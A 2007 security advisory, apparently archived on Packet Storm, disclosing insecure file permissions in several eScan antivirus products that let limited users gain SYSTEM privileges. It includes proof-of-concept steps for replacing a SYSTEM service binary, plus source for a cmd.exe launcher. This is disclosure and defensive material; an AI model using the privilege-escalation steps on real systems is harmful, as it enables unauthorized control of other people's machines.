what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

TISA2007-13-Public.txt

TISA2007-13-Public.txt
Posted Aug 30, 2007
Authored by Maldin d.o.o | Site teamintell.com

Team Intell Security Advisory TISA2007-13-Public - Multiple eScan products suffer from insecure file permissions.

tags | advisory
SHA-256 | 1aba748a2a274c3e0c4be06e1f617c314ecc60d72089ebd9d9188f02c5162309

TISA2007-13-Public.txt

Change Mirror Download

=========================================================================
Team Intell Security Advisory TISA2007-13-Public
-------------------------------------------------------------------------
Multiple eScan products insecure file permissions
=========================================================================

Release date: 30.08.2007
Severity: Moderately critical
Impact: Privilege escalation
Remote: No
Status: Unpatched
Software: eScan Virus Control 9.0.722.1
eScan Anti-Virus 9.0.722.1
eScan Internet Security 9.0.722.1
Tested on: Microsoft Windows XP SP2
Vendor: http://www.mwti.net/
Disclosed by: Edi Strosar (Team Intell)


Vendor's description of affected application(s):
================================================
"eScan is the latest offering from MicroWorld Technologies
Inc. It offers a combination of features to help you fight
the threat of viruses, set security policies for parental
control over content accessed by your child. It guards
against Internet misuse, block spam and offensive mails
and block popup ads."

Download link:
http://www.mwti.net/products/download_center.asp


Analysis:
=========
eScan product line is prone to security issue which can be
exploited by LUA users to gain escalated privileges.

The problem is caused due to the application setting
insecure default permissions (grants Everyone:Full
Control) on the eScan installation directory and all it's
child objects. This can be exploited to remove,
manipulate, and replace any of the application's files.

Successful exploitation allows execution of arbitrary code
with SYSTEM privileges.


Proof of concept:
=================
- logon as LUA user
- rename traysser.exe to traysser.exe.BAK
- copy program.exe to eScan installation directory
- rename program.exe to traysser.exe
- restart the computer
- "rootshell" ;)

NOTE: traysser.exe is eScan Server Updater Service that
runs as NT AUTHORITY\SYSTEM.

Tested on multiple eScan products v9.0.722.1. Other
products/versions may be affected.


Source code for program.exe:
============================
#include <stdio.h>

int main()
{
system("cmd.exe");
return 0;
}


Solution:
=========
Set proper permissions on the eScan installation directory
and all it's child objects. NOTE: this may impact the
functionality.


Timeline:
=========
10.08.2007 - initial vendor notification
20.08.2007 - additional vendor notification
30.08.2007 - public disclosure


Contact:
========
Maldin d.o.o.
Trzaska cesta 2
1000 Ljubljana - SI

tel: +386 (0)590 70 170
fax: +386 (0)590 70 177
gsm: +386 (0)31 816 400
web: www.teamintell.com
e-mail: info@teamintell.com


Disclaimer:
===========
The content of this report is purely informational and
meant for educational purposes only. Maldin d.o.o. shall
in no event be liable for any damage whatsoever, direct or
implied, arising from use or spread of this information.
Any use of information in this advisory is entirely at
user's own risk.

=========================================================================

Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    12 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    14 Files
  • 6
    Dec 6th
    18 Files
  • 7
    Dec 7th
    11 Files
  • 8
    Dec 8th
    45 Files
  • 9
    Dec 9th
    9 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close